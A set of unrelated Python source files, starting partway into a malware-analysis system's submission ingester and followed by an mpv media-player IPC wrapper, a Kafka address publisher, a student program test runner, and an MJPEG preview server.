c12n = notice.get('classification', config.core.middleman.classification)
expiry = now_as_iso(86400)
sha256 = notice.get('sha256')
datastore.save_or_freshen_file(sha256, {'sha256': sha256}, expiry, c12n)
datastore.close()
def expired(delta, errors):
if errors:
return delta >= incomplete_expire_after_seconds
else:
return delta >= expire_after_seconds
def finalize(psid, sid, score, notice): # df node def
logger.debug("Finalizing (score=%d) %s", score, notice.get('sha256'))
if psid:
notice.set('psid', psid)
notice.set('sid', sid)
notice.set('al_score', score)
selected = notice.get('selected', [])
resubmit_to = notice.get('resubmit_to', [])
resubmit_selected = determine_resubmit_selected(selected, resubmit_to)
will_resubmit = resubmit_selected and should_resubmit(score)
if will_resubmit:
notice.set('psid', None)
if is_alert(notice, score):
alertq.push(notice.raw) # df push push
send_notification(notice)
if will_resubmit:
notice.set('psid', sid)
notice.set('resubmit_to', [])
notice.set('scan_key', None)
notice.set('sid', None)
notice.set('selected', resubmit_selected)
priority = notice.get('priority', 0)
uniqueq.push(priority, notice.raw) # df push push
def ingest(datastore, user_groups, raw): # df node def
notice = Notice(raw)
ignore_size = notice.get('ignore_size', False)
never_drop = notice.get('never_drop', False)
sha256 = notice.get('sha256')
size = notice.get('size', 0)
# Make sure we have a submitter ...
user = notice.get('submitter', None)
if user is None:
user = config.submissions.user
notice.set('submitter', user)
# ... and groups.
groups = notice.get('groups', None)
if groups is None:
groups = user_groups.get(user, None)
if groups is None:
ruser = datastore.get_user(user)
if not ruser:
return
groups = ruser.get('groups', [])
user_groups[user] = groups
notice.set('groups', groups)
selected = notice.get('selected', None)
if not selected:
selected = selected_initial
notice.set('selected', selected)
notice.set('resubmit_to', ['Dynamic Analysis'])
resubmit_to = notice.get('resubmit_to', None)
if resubmit_to is None:
notice.set('resubmit_to', [])
ingester_counts.increment('ingest.bytes_ingested', int(size))
ingester_counts.increment('ingest.submissions_ingested')
if not sha256:
send_notification(
notice, failure="Invalid sha256", logfunc=logger.warning
)
return
c12n = notice.get('classification', '')
if not Classification.is_valid(c12n):
send_notification(
notice, failure="Invalid classification %s" % c12n,
logfunc=logger.warning
)
return
metadata = notice.get('metadata', {})
if isinstance(metadata, dict):
to_delete = []
for k, v in metadata.iteritems():
size = sys.getsizeof(v, -1)
if isinstance(v, basestring):
size = len(v)
if size > config.core.middleman.max_value_size:
to_delete.append(k)
elif size < 0:
to_delete.append(k)
if to_delete:
logger.info('Removing %s from %s', to_delete, notice.raw)
for k in to_delete:
metadata.pop(k, None)
if size > config.submissions.max.size and not ignore_size and not never_drop:
notice.set(
'failure', "File too large (%d > %d)" % (size, config.submissions.max.size)
)
dropq.push(notice.raw) # df push push
ingester_counts.increment('ingest.skipped')
return
pprevious, previous, score = None, False, None
if not notice.get('ignore_cache', False):
pprevious, previous, score, _ = check(datastore, notice)
# Assign priority.
low_priority = is_low_priority(notice)
priority = notice.get('priority')
if priority is None:
priority = priority_value['medium']
if score is not None:
priority = priority_value['low']
for level in ('critical', 'high'):
if score >= threshold_value[level]:
priority = priority_value[level]
break
elif low_priority:
priority = priority_value['low']
# Reduce the priority by an order of magnitude for very old files.
current_time = now()
if priority and \
expired(current_time - seconds(notice.get('ts', current_time)), 0):
priority = (priority / 10) or 1
notice.set('priority', priority)
# Do this after priority has been assigned.
# (So we don't end up dropping the resubmission).
if previous:
ingester_counts.increment('ingest.duplicates')
finalize(pprevious, previous, score, notice) # df push calls
return
if drop(notice): # df push calls
return
if is_whitelisted(notice): # df push calls
return
uniqueq.push(priority, notice.raw) # df push push
@exit_and_log
def ingester(): # df node def # pylint:disable=R0912
datastore = forge.get_datastore()
user_groups = {}
# Move from ingest to unique and waiting queues.
# While there are entries in the ingest queue we consume chunk_size
# entries at a time and move unique entries to uniqueq / queued and
# duplicates to their own queues / waiting.
while running:
while True:
result = completeq.pop(blocking=False) # df pull pop
if not result:
break
completed(Task(result)) # df push calls
entry = ingestq.pop(timeout=1) # df pull pop
if not entry:
continue
trafficq.push(entry) # df push push
sha256 = entry.get('sha256', '')
if not sha256 or len(sha256) != 64:
logger.error("Invalid sha256: %s", entry)
continue
entry['md5'] = entry.get('md5', '').lower()
entry['sha1'] = entry.get('sha1', '').lower()
entry['sha256'] = sha256.lower()
ingest(datastore, user_groups, entry) # df push calls
datastore.close()
# noinspection PyBroadException
def init():
datastore = forge.get_datastore()
datastore.commit_index('submission')
sids = [
x['submission.sid'] for x in datastore.stream_search(
'submission',
'state:submitted AND times.submitted:[NOW-1DAY TO *] '
'AND submission.metadata.type:* '
'AND NOT submission.description:Resubmit*'
)
]
submissions = {}
submitted = {}
for submission in datastore.get_submissions(sids):
task = Task(submission)
if not task.original_selected or not task.root_sha256 or not task.scan_key:
continue
if forge.determine_ingest_queue(task.root_sha256) != ingestq_name:
continue
scan_key = task.scan_key
submissions[task.sid] = submission
submitted[scan_key] = task.sid
# Outstanding is the set of things Riak believes are being scanned.
outstanding = set(submitted.keys())
# Keys is the set of things middleman believes are being scanned.
keys = set(scanning.keys())
# Inflight is the set of submissions middleman and Riak agree are inflight.
inflight = outstanding.intersection(keys)
# Missing is the set of submissions middleman thinks are in flight but
# according to Riak are not incomplete.
missing = keys.difference(inflight)
# Process the set of submissions Riak believes are incomplete but
# middleman doesn't know about.
for scan_key in outstanding.difference(inflight):
sid = submitted.get(scan_key, None)
if not sid:
logger.info("Init: No sid found for incomplete")
continue
if not task.original_selected or not task.root_sha256 or not task.scan_key:
logger.info("Init: Not root_sha256 or original_selected")
continue
submission = submissions[sid]
task = Task(submission)
if not task.metadata:
logger.info(
"Init: Incomplete submission is not one of ours: %s", sid
)
stype = None
try:
stype = task.metadata.get('type', None)
except: # pylint: disable=W0702
logger.exception(
"Init: Incomplete submission has malformed metadata: %s", sid
)
if not stype:
logger.info("Init: Incomplete submission missing type: %s", sid)
raw = {
'metadata': task.metadata,
'overrides': get_submission_overrides(task, overrides),
'sha256': task.root_sha256,
'type': stype,
}
raw['overrides']['selected'] = task.original_selected
reinsert(datastore, " (incomplete)", Notice(raw), logger)
r = redis.StrictRedis(persistent['host'],
persistent['port'],
persistent['db'])
# Duplicates is the set of sha256s where a duplicate queue exists.
duplicates = [
x.replace(dup_prefix, '', 1) for x in r.keys(dup_prefix + '*')
]
# Process the set of duplicates where no scanning or riak entry exists.
for scan_key in set(duplicates).difference(outstanding.union(keys)):
raw = dupq.pop(dup_prefix + scan_key, blocking=False)
if not raw:
logger.warning("Init: Couldn't pop off dup queue (%s)", scan_key)
dupq.delete(dup_prefix + scan_key)
continue
reinsert(datastore, " (missed duplicate)", Notice(raw), logger)
while True:
res = completeq.pop(blocking=False)
if not res:
break
scan_key = completed(Task(res))
try:
missing.remove(scan_key)
except: # pylint: disable=W0702
pass
# Process the set of submissions middleman thinks are in flight but
# according to Riak are not incomplete.
for scan_key in missing:
raw = scanning.pop(scan_key)
if raw:
reinsert(datastore, '', Notice(raw), logger, retry_all=False)
# Set up time outs for all inflight submissions.
expiry_time = now(max_time)
for scan_key in inflight:
# No need to lock. We're the only thing running at this point.
timeouts.append(Timeout(scan_key, expiry_time))
signal.signal(signal.SIGINT, interrupt)
signal.signal(signal.SIGTERM, interrupt)
datastore.close()
# noinspection PyUnusedLocal
def interrupt(unused1, unused2): # pylint:disable=W0613
global running # pylint:disable=W0603
logger.info("Caught signal. Coming down...")
running = False
def is_alert(notice, score):
generate_alert = notice.get('generate_alert', True)
if not generate_alert:
return False
if score < threshold_value['critical']:
return False
return True
def is_whitelisted(notice): # df node def
reason, hit = get_whitelist_verdict(whitelist, notice)
hit = {x: dotdump(safe_str(y)) for x, y in hit.iteritems()}
sha256 = notice.get('sha256')
if not reason:
with whitelisted_lock:
reason = whitelisted.get(sha256, None)
if reason:
hit = 'cached'
if reason:
if hit != 'cached':
with whitelisted_lock:
whitelisted[sha256] = reason
notice.set(
'failure',
"Whitelisting due to reason %s (%s)" % (dotdump(safe_str(reason)), hit)
)
dropq.push(notice.raw) # df push push
ingester_counts.increment('ingest.whitelisted')
whitelister_counts.increment('whitelist.' + reason)
return reason
@exit_and_log
def maintain_inflight(): # df node def
while running:
# If we are scanning less than the max_waiting, submit more.
length = scanning.length() + submissionq.length()
if length < 0:
time.sleep(1)
continue
num = max_waiting - length
if num <= 0:
time.sleep(1)
continue
entries = uniqueq.pop(num) # df pull pop
if not entries:
time.sleep(1)
continue
for raw in entries:
# Remove the key event_timestamp if it exists.
raw.pop('event_timestamp', None)
submissionq.push(raw) # df push push
###############################################################################
#
# To calculate the probability of dropping an incoming submission we compare
# the number returned by random() which will be in the range [0,1) and the
# number returned by tanh() which will be in the range (-1,1).
#
# If length is less than maximum the number returned by tanh will be negative
# and so drop will always return False since the value returned by random()
# cannot be less than 0.
#
# If length is greater than maximum, drop will return False with a probability
# that increases as the distance between maximum and length increases:
#
# Length Chance of Dropping
#
# <= maximum 0
# 1.5 * maximum 0.76
# 2 * maximum 0.96
# 3 * maximum 0.999
#
###############################################################################
def must_drop(length, maximum):
return random() < drop_chance(length, maximum)
@exit_and_log
def process_retries(): # df node def
while running:
raw = retryq.pop(timeout=1) # df pull pop
if not raw:
continue
retry_at = raw['retry_at']
delay = retry_at - now()
if delay >= 0.125:
retryq.unpop(raw)
time.sleep(min(delay, 1))
continue
ingestq.push(raw) # df push push
# noinspection PyBroadException
@exit_and_log
def process_timeouts(): # df node def
global timeouts # pylint:disable=W0603
with timeouts_lock:
current_time = now()
index = 0
for t in timeouts:
if t.time >= current_time:
break
index += 1
try:
timed_out(t.scan_key) # df push calls
except: # pylint: disable=W0702
logger.exception("Problem timing out %s:", t.scan_key)
timeouts = timeouts[index:]
def reinsert(datastore, msg, notice, out, retry_all=True):
sha256 = notice.get('sha256')
if not sha256:
logger.error("Invalid sha256: %s", notice.raw)
if forge.determine_ingest_queue(sha256) != ingestq_name:
return
pprevious, previous, score = None, False, None
if not notice.get('ignore_cache', False):
pprevious, previous, score, _ = check(datastore, notice)
if previous:
out.info("Init: Found%s: %s", msg, notice.get('sha256'))
finalize(pprevious, previous, score, notice)
elif retry_all or not score:
logger.info("Init: Retrying%s: %s", msg, notice.get('sha256'))
ingestq.push(notice.raw)
else:
logger.info("Init: Stale%s: %s", msg, notice.get('sha256'))
def retry(raw, scan_key, sha256, ex): # df node def
current_time = now()
notice = Notice(raw)
retries = notice.get('retries', 0) + 1
if retries > max_retries:
trace = ''
if ex and type(ex) != FileStoreException:
trace = ': ' + get_stacktrace_info(ex)
logger.error('Max retries exceeded for %s%s', sha256, trace)
dupq.delete(dup_prefix + scan_key)
elif expired(current_time - seconds(notice.get('ts', current_time)), 0):
logger.info('No point retrying expired submission for %s', sha256)
dupq.delete(dup_prefix + scan_key) # df pull delete
else:
logger.info('Requeuing %s (%s)', sha256, ex or 'unknown')
notice.set('retries', retries)
notice.set('retry_at', now(retry_delay))
retryq.push(notice.raw) # df push push
def return_exception(func, *args, **kwargs):
try:
func(*args, **kwargs)
return None
except Exception as ex: # pylint: disable=W0703
return ex
# noinspection PyBroadException
def seconds(t, default=0):
try:
try:
return float(t)
except ValueError:
return iso_to_epoch(t)
except: # pylint:disable=W0702
return default
def send_heartbeat():
t = now()
up_hours = (t - start_time) / (60.0 * 60.0)
queues = {}
drop_p = {}
for level in ('low', 'medium', 'critical', 'high'):
queues[level] = uniqueq.count(*priority_range[level])
threshold = sample_threshold[level]
drop_p[level] = 1 - max(0, drop_chance(queues[level], threshold))
heartbeat = {
'hostinfo': hostinfo,
'inflight': scanning.length(),
'ingest': ingestq.length(),
'ingesting': drop_p,
'queues': queues,
'shard': shard,
'up_hours': up_hours,
'waiting': submissionq.length(),
'ingest.bytes_completed': 0,
'ingest.bytes_ingested': 0,
'ingest.duplicates': 0,
'ingest.files_completed': 0,
'ingest.skipped': 0,
'ingest.submissions_completed': 0,
'ingest.submissions_ingested': 0,
'ingest.timed_out': 0,
'ingest.whitelisted': 0,
}
# Send ingester stats.
exported = ingester_counts.export()
# Add ingester stats to our heartbeat.
heartbeat.update(exported)
# Send our heartbeat.
raw = message.Message(to="*", sender='middleman',
mtype=message.MT_INGESTHEARTBEAT,
body=heartbeat).as_dict()
statusq.publish(raw)
# Send whitelister stats.
whitelister_counts.export()
@exit_and_log
def send_heartbeats():
while running:
send_heartbeat()
time.sleep(1)
def send_notification(notice, failure=None, logfunc=logger.info):
if failure:
notice.set('failure', failure)
failure = notice.get('failure', None)
if failure:
logfunc("%s: %s", failure, str(notice.raw))
queue_name = notice.get('notification_queue', False)
if not queue_name:
return
score = notice.get('al_score', 0)
threshold = notice.get('notification_threshold', None)
if threshold and score < int(threshold):
return
q = notificationq.get(queue_name, None)
if not q:
notificationq[queue_name] = q = \
queue.NamedQueue(queue_name, **persistent)
q.push(notice.raw)
@exit_and_log
def send_traffic():
real_trafficq = queue.CommsQueue('traffic')
while running:
msg = trafficq.pop(timeout=1)
if not msg:
continue
real_trafficq.publish(msg)
def should_resubmit(score):
# Resubmit:
#
# 100% with a score above 400.
# 10% with a score of 301 to 400.
# 1% with a score of 201 to 300.
# 0.1% with a score of 101 to 200.
# 0.01% with a score of 1 to 100.
# 0.001% with a score of 0.
# 0% with a score below 0.
if score < 0:
return False
if score > 400:
return True
resubmit_probability = 1.0 / 10 ** ((500 - score) / 100)
return random() < resubmit_probability
def stale(delta, errors):
if errors:
return delta >= incomplete_stale_after_seconds
else:
return delta >= stale_after_seconds
def submit(client, notice):
priority = notice.get('priority')
sha256 = notice.get('sha256')
hdr = notice.parse(
description=': '.join((default_prefix, sha256 or '')), **defaults
)
user = hdr.pop('submitter')
hdr.pop('priority', None)
path = notice.get('filename', None) or sha256
client.submit(sha256, path, priority, user, **hdr)
with timeouts_lock:
timeouts.append(Timeout(now(max_time), notice.get('scan_key')))
# noinspection PyBroadException
@exit_and_log
def submitter(): # df node def
client = forge.get_submission_service()
datastore = forge.get_datastore()
while running:
try:
raw = submissionq.pop(timeout=1) # df pull pop
if not raw:
continue
# noinspection PyBroadException
try:
sha256 = raw['sha256']
except Exception: # pylint: disable=W0703
logger.exception("Malformed entry on submission queue:")
continue
if not sha256:
logger.error("Malformed entry on submission queue: %s", raw)
continue
notice = Notice(raw)
if drop(notice): # df push calls
continue
if is_whitelisted(notice): # df push calls
continue
pprevious, previous, score = None, False, None
if not notice.get('ignore_cache', False):
pprevious, previous, score, scan_key = check(datastore, notice)
if previous:
if not notice.get('resubmit_to', []) and not pprevious:
logger.warning("No psid for what looks like a resubmission of %s: %s", sha256, scan_key)
finalize(pprevious, previous, score, notice) # df push calls
continue
with ScanLock(scan_key):
if scanning.exists(scan_key):
logger.debug('Duplicate %s', sha256)
ingester_counts.increment('ingest.duplicates')
dupq.push(dup_prefix + scan_key, notice.raw) # df push push
continue
scanning.add(scan_key, notice.raw) # df push add
ex = return_exception(submit, client, notice)
if not ex:
continue
ingester_counts.increment('ingest.error')
should_retry = True
tex = type(ex)
if tex == FileStoreException:
ex = tex("Problem with file: %s" % sha256)
elif tex == CorruptedFileStoreException:
logger.error("Submission failed due to corrupted filestore: %s" % ex.message)
should_retry = False
else:
trace = get_stacktrace_info(ex)
logger.error("Submission failed: %s", trace)
raw = scanning.pop(scan_key)
if not raw:
logger.error('No scanning entry for for %s', sha256)
continue
if not should_retry:
continue
retry(raw, scan_key, sha256, ex)
if tex == riak.RiakError:
raise ex # pylint: disable=E0702
except Exception: # pylint:disable=W0703
logger.exception("Unexpected error")
# Invoked when a timeout fires. (Timeouts always fire).
def timed_out(scan_key): # df node def
actual_timeout = False
with ScanLock(scan_key):
# Remove the entry from the hash of submissions in progress.
entry = scanning.pop(scan_key) # df pull pop
if entry:
actual_timeout = True
logger.error("Submission timed out for %s: %s", scan_key, str(entry))
dup = dupq.pop(dup_prefix + scan_key, blocking=False) # df pull pop
if dup:
actual_timeout = True
while dup:
logger.error("Submission timed out for %s: %s", scan_key, str(dup))
dup = dupq.pop(dup_prefix + scan_key, blocking=False)
if actual_timeout:
ingester_counts.increment('ingest.timed_out')
ingester_counts = counter.AutoExportingCounters(
name='ingester',
host=net.get_hostip(),
auto_flush=True,
auto_log=False,
export_interval_secs=config.system.update_interval,
channel=forge.get_metrics_sink())
whitelister_counts = counter.AutoExportingCounters(
name='whitelister',
host=net.get_hostip(),
auto_flush=True,
auto_log=False,
export_interval_secs=config.system.update_interval,
channel=forge.get_metrics_sink())
init()
Thread(target=maintain_inflight, name="maintain_inflight").start()
Thread(target=process_retries, name="process_retries").start()
Thread(target=send_heartbeats, name="send_heartbeats").start()
Thread(target=send_traffic, name="send_traffic").start()
# pylint: disable=C0321
for i in range(dropper_threads):
Thread(target=dropper, name="dropper_%s" % i).start() # df line thread
# noinspection PyRedeclaration
for i in range(ingester_threads):
Thread(target=ingester, name="ingester_%s" % i).start() # df line thread
# noinspection PyRedeclaration
for i in range(submitter_threads):
Thread(target=submitter, name="submitter_%s" % i).start() # df line thread
while running:
process_timeouts()
time.sleep(60)
# df text }
|
mediaplayer.py
|
import time
import json
import threading
import socket
from twisted.internet import reactor
class MediaPlayerProperty():
def __init__(self, property_, request_id):
self.property = property_
self.request_id = request_id
@property
def command(self):
return {'command': ['get_property', self.property],
'request_id': self.request_id}
class MediaPlayer():
"""MediaPlayer class is a representation of the mpv media player connected
via the mpv JSON IPC protocol (https://mpv.io/manual/master/#json-ipc). The
class uses a UNIX socket to connect to mpv and uses a daemon thread to
listen to responses from mpv.
"""
PROPERTY_PAUSED = MediaPlayerProperty('pause', 1)
PROPERTY_POSITION = MediaPlayerProperty('time-pos', 2)
PROPERTY_DURATION = MediaPlayerProperty('duration', 3)
PROPERTY_FILESIZE = MediaPlayerProperty('file-size', 4)
PROPERTY_FILENAME = MediaPlayerProperty('filename', 5)
def __init__(self, address):
"""Initialize the socket using the supplied address and start the
listener thread.
"""
self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.socket.connect(address)
self.listen_thread = threading.Thread(target=self.listen)
self.listen_thread.daemon = True
self.listen_thread.start()
def _send(self, command):
"""Send a command to the mpv socket. Accepts a dictionary and turns it
to a JSON byte-string before sending it to the socket.
"""
data = (json.dumps(command, separators=(',', ':')).encode('utf8'))
self.socket.send(data + b'\n')
def _get_property(self, player_property, variable):
"""Sends a command to the player requesting a property. Blocks until
property is returned and saved to specified instance variable.
"""
setattr(self, variable, None)
self._send(player_property.command)
while getattr(self, variable) is None:
time.sleep(0.05)
return getattr(self, variable)
@property
def duration(self):
"""Returns the total length of the current file as seconds (float).
Blocks until a value is returned.
"""
return self._get_property(MediaPlayer.PROPERTY_DURATION, '_duration')
@property
def filename(self):
"""Returns the file name of the current file as a string. Blocks until
a value is returned.
"""
return self._get_property(MediaPlayer.PROPERTY_FILENAME, '_filename')
@property
def filesize(self):
"""Returns the filesize of the current file as bytes (integer). Blocks
until a value is returned.
"""
return self._get_property(MediaPlayer.PROPERTY_FILESIZE, '_filesize')
def handle_event(self, data):
"""Triggers callbacks based on incoming events."""
"""TODO: Implement the method."""
pass
def handle_data(self, data):
"""Sets private instance variables to data returned by mpv. The
association between a value and property is done using the constant
request IDs that have been assigned to a particular property in the
code.
"""
if 'request_id' not in data:
return
if data['request_id'] == MediaPlayer.PROPERTY_PAUSED.request_id:
self._paused = data['data']
elif data['request_id'] == MediaPlayer.PROPERTY_POSITION.request_id:
self._position = data['data']
elif data['request_id'] == MediaPlayer.PROPERTY_DURATION.request_id:
self._duration = data['data']
elif data['request_id'] == MediaPlayer.PROPERTY_FILESIZE.request_id:
self._filesize = data['data']
elif data['request_id'] == MediaPlayer.PROPERTY_FILENAME.request_id:
self._filename = data['data']
def listen(self):
"""Method to be ran in a separate thread. Listens to the mpv UNIX
socket and sends events to MediaPlayer.handle_event and data responses
to MediaPlayer.handle_data.
"""
while True:
response_data = self.socket.recv(1024)
for message in str(response_data, 'utf8').strip().split('\n'):
try:
response = json.loads(message)
except json.decoder.JSONDecodeError:
reactor.stop()
if 'event' in response:
self.handle_event(response)
if 'error' in response and response['error'] == 'success':
self.handle_data(response)
def pause(self, state):
"""Tells the player to set paused status to state (boolean).
Asynchronous command and not verified in any way.
"""
command = {'command': ['set_property', 'pause', state]}
self._send(command)
@property
def paused(self):
"""Returns a boolean value indicating if the player is paused or not.
Blocks until a value is returned.
"""
return self._get_property(MediaPlayer.PROPERTY_PAUSED, '_paused')
@property
def position(self):
"""Returns the current playback position as seconds (float). Blocks
until a value is returned.
"""
return self._get_property(MediaPlayer.PROPERTY_POSITION, '_position')
def seek(self, position):
"""Seeks the player to the position in seconds (float).
Asynchronous command and not verified in any way.
"""
command = {'command': ['set_property', 'time-pos', position]}
self._send(command)
|
address_publisher.py
|
"address_publisher.py - Takes addresses from Kafka and submit them to node"
from app import settings
from app.request_wrapper import RequestWrapper
from app.kafka_wrapper import Consumer
from prometheus_client import Gauge, Histogram, start_http_server
from queue import Queue
import logging
import threading
import time
log = logging.getLogger(__name__)
s = Histogram(f"address_publisher_processing_request_time", "Time of processing request", ["worker", "node"])
g = Gauge("address_publisher_queue_size", "Actual size of queue")
def worker(worker_number, queue):
log.info(f"worker-{worker_number}.consumer_created")
while True:
for node in settings.NODE_TO_ACCEPT_CONNECTIONS:
log.info(f"worker-{worker_number}.queue_size={queue.qsize()}")
address = queue.get()
log.info(f"worker-{worker_number}.got_message_from_queue")
try:
start_time = time.time()
RequestWrapper(node).post_new_peer(address)
request_time = time.time() - start_time
s.labels(f"{worker_number}", node).observe(request_time)
except Exception:
log.exception("worker.address_posting_failed")
def fill_queue_worker(queue, consumer):
while True:
log.info("fill_queue_worker.start_filling")
g.set(queue.qsize())
for _ in range(settings.CHUNK_SIZE_FOR_CONSUMER):
queue.put(consumer.get_message())
log.info("fill_queue_worker.got_message_from_kafka")
time.sleep(settings.PUBLISHER_SLEEP)
def main():
log.info("main.creating_consumer")
consumer = Consumer(group_id="same_group")
log.info("main.obtained_consumer")
threads = []
queue = Queue()
for n in range(settings.WORKERS):
log.info(f"main.creating_worker_{n}")
thread = threading.Thread(target=worker, args=[n, queue])
threads.append(thread)
thread.start()
fill_queue_worker(queue, consumer)
if __name__ == "__main__":
start_http_server(8001)
main()
|
testio.py
|
import json
import sys
import subprocess
import multiprocessing
import re
import os
import errno
import fpdf
PROGRAM_PATH_JSON = "ProgramPath"
TIMEOUT_JSON = "Timeout"
TEST_JSON = "Test\s?\d*"
TEST_INPUT_JSON = "input"
TEST_OUTPUT_JSON = "output"
TEST_PASSED_MSG = "Test passed successfully!"
TEST_FAILED_MSG = "Test failed :("
TEST_ERROR_MSG = "Your program contains errors :("
TEST_TIMEOUT_MSG = "Your program runs for too long :("
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class ProgramOutput:
def __init__(self, path, timeout, tests, leading_path = None):
self.path = os.path.join(leading_path, path) if leading_path else path
self.tests = tests
self.timeout = timeout
self.results = []
self.successful_tests = 0
self.run()
def run_test(self, test):
pipe = subprocess.Popen("python3 {}".format(self.path), shell=True, stdout = subprocess.PIPE,
stdin=subprocess.PIPE, stderr = subprocess.PIPE)
communication_result = None
try:
communication_result = pipe.communicate(input=test.input_to_str().encode(),
timeout=self.timeout)
except subprocess.TimeoutExpired:
self.results.append(('Timeout', ''))
return
assert(len(communication_result) == 2)
stdout = communication_result[0].decode("utf-8")[:-1]
stderr = communication_result[1].decode("utf-8")
if stdout == test.output_to_str() and not stderr:
self.successful_tests += 1
self.results.append((stdout, stderr))
def run(self):
for test in self.tests:
p = multiprocessing.Process(target=self.run_test(test))
p.start()
p.join(self.timeout)
while p.is_alive():
p.terminate()
if not p.is_alive():
ProgramOutput.display_timeout_msg()
self.display_test_results()
def display_test_results(self):
pdf = fpdf.FPDF(format='letter')
pdf.add_page()
pdf.set_font("Arial", size=12)
msg = "{}Results for {} Passed: {}/{} Failed: {}/{}{}".format(
bcolors.HEADER, os.path.basename(self.path),
self.successful_tests, len(self.results),
len(self.results) - self.successful_tests,
len(self.results), bcolors.ENDC)
print(msg)
pdf.multi_cell(0, 5, msg[5:-3] + '\n')
if len(self.tests) > len(self.results):
return
for test in self.tests:
stdout, stderr = self.results.pop(0)
ProgramOutput.display_test_result(stdout, stderr, test, pdf)
pdf.output("test_result_{}.pdf".format(os.path.splitext(os.path.basename(self.path))[0]))
@staticmethod
def display_test_result(stdout, stderr, test, pdf = None):
if len(stderr) > 0:
ProgramOutput.display_error_msg(stderr)
if pdf:
pdf.multi_cell(0, 5, stderr + '\n')
return
elif stdout == test.output_to_str():
print("{}{}".format(bcolors.OKGREEN, TEST_PASSED_MSG))
if pdf:
pdf.multi_cell(0, 5, TEST_PASSED_MSG + '\n')
elif stdout == 'Timeout':
print("{}{}".format(bcolors.WARNING, TEST_TIMEOUT_MSG))
if pdf:
pdf.multi_cell(0, 5, TEST_TIMEOUT_MSG + '\n')
else:
print("{}{}".format(bcolors.FAIL, TEST_FAILED_MSG))
if pdf:
pdf.multi_cell(0, 5, TEST_FAILED_MSG + '\n')
msg1 = "{:<15} {:<15} {:<15}".format("Input data:", "Expected:", "Result:")
msg2 = "{:<15} {:<15} {:<15}{}".format(test.input_to_str().replace("\n", " "),
test.output_to_str().replace("\n", " "), stdout.replace("\n", " "),
bcolors.ENDC)
print(msg1)
print(msg2)
if pdf:
for msg in (msg1, msg2[:-3]):
pdf.multi_cell(0, 5, msg + '\n')
@staticmethod
def display_error_msg(stderr):
print("{}{}{}".format(bcolors.FAIL, TEST_ERROR_MSG, bcolors.ENDC))
print(stderr)
@staticmethod
def display_timeout_msg():
print("{}{}{}".format(bcolors.WARNING, TEST_TIMEOUT_MSG, bcolors.ENDC))
class Test:
def __init__(self, input_data, output):
self.input_data = input_data
self.output = output
def input_to_str(self):
if not self.input_data:
return ''
string = ''.join(data + '\n' for data in self.input_data)
return string[:-1]
def output_to_str(self):
if not self.output:
return ''
string = ''.join(data + '\n' for data in self.output)
return string[:-1]
class Parser:
def __init__(self, path):
self.data = None
self.tests = []
self.read_config_file(path)
self.validate_config_file()
def read_config_file(self, path):
try:
with open(path) as f:
self.data = json.load(f)
self.parse_tests()
except EnvironmentError:
print('Failed to open config file')
def parse_tests(self):
for key in self.data:
if re.compile(TEST_JSON).match(key):
test_data = self.data[key]
if TEST_INPUT_JSON in test_data and TEST_OUTPUT_JSON in test_data:
input_data = test_data[TEST_INPUT_JSON]
output = test_data[TEST_OUTPUT_JSON]
self.tests.append(Test(input_data, output))
def validate_config_file(self):
if PROGRAM_PATH_JSON not in self.data:
raise Exception('{} not found in config file!'.format(PROGRAM_PATH_JSON))
if PROGRAM_PATH_JSON not in self.data:
raise Exception('{} not found in config file!'.format(TIMEOUT_JSON))
if len(self.tests) == 0:
raise Exception('no tests found in config file!')
def get_leading_path(path):
head, tail = os.path.split(path)
return head
def files_in_dir(path):
result = []
for _file in os.listdir(path):
if os.path.isfile(os.path.join(path, _file)) and not os.path.isdir(os.path.join(path, _file)):
result.append(_file)
return result
def file_exists(path):
if not os.path.isfile(path):
raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), path)
return True
def parse_command_line_args(args):
if len(args) > 1:
path = args[1]
if file_exists(path):
return path
else:
raise Exception("You have to provide path to config file as an argument!")
def test_program_output():
path = parse_command_line_args(sys.argv)
leading_path = get_leading_path(path)
parser = Parser(path)
data = parser.data
path = data[PROGRAM_PATH_JSON]
timeout = data[TIMEOUT_JSON]
if os.path.isdir(os.path.join(leading_path, path)):
for _file in files_in_dir(os.path.join(leading_path, path)):
ProgramOutput(_file, timeout, parser.tests, os.path.join(leading_path, path))
else:
ProgramOutput(path, timeout, parser.tests, leading_path)
if __name__ == "__main__":
test_program_output()
|
mjpeg_server.py
|
# Copyright (c) 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# This source code is subject to the terms found in the AWS Enterprise Customer Agreement.
"""
MJPEG server for Panorama inference output
"""
import logging
from http.server import BaseHTTPRequestHandler, HTTPServer
from io import StringIO
import cv2
from threading import Thread
from threading import Lock
import time
#logging.getLogger().setLevel('DEBUG')
#Globals
display_buffer = None
frames_received = False
mjpeg_lock = Lock()
mjpeg_file = 'preview.mjpg'
sleep_rate = 0.05
mjpeg_path = '/' + mjpeg_file
print('MJPEG Path{}'.format(mjpeg_path))
class PanoramaMJPEGServerHandler(BaseHTTPRequestHandler):
"""
Take frames from panorama inference output and serve it up as a rudimentery
screen scraper in the form of an MJPEG server. NOTE: You have to add the labels
and rectangles using OpenCV instead of the Panorama SDK for this to work
"""
def do_GET(self):
"""
Return mjpeg frames
"""
global display_buffer, frames_received
logging.debug("do_GET: {}", self.path)
if self.path == mjpeg_path:
try:
# Return if frames have not been received
if frames_received == False:
self.send_file_not_found()
return
else:
# Send 200 with the jpeg boundary
self.send_response(200)
self.send_header(
'Content-type',
'multipart/x-mixed-replace; boundary=--jpgboundary'
)
self.end_headers()
# Sit in a forever loop and keep serving up frames
while True:
# Acquire lock
logging.debug("Acquiring lock for jpg")
mjpeg_lock.acquire()
# Send the converted jpeg buffer
self.wfile.write("--jpgboundary".encode("utf-8"))
self.send_header('Content-type', 'image/jpeg')
self.send_header('Content-length', str(len(display_buffer)))
self.end_headers()
self.wfile.write(display_buffer)
# Release lock
logging.debug("Releasing lock for jpg")
mjpeg_lock.release()
time.sleep(sleep_rate)
except Exception as ex:
logging.error("Error in mjpeg serve: %s", str(ex))
mjpeg_lock.release()
else:
self.send_file_not_found()
def send_file_not_found(self):
"""
Send out 404 response
"""
logging.debug("Sending File not Found")
self.send_response(404)
self.send_header('Content-type', 'text/html'.encode("utf-8"))
self.end_headers()
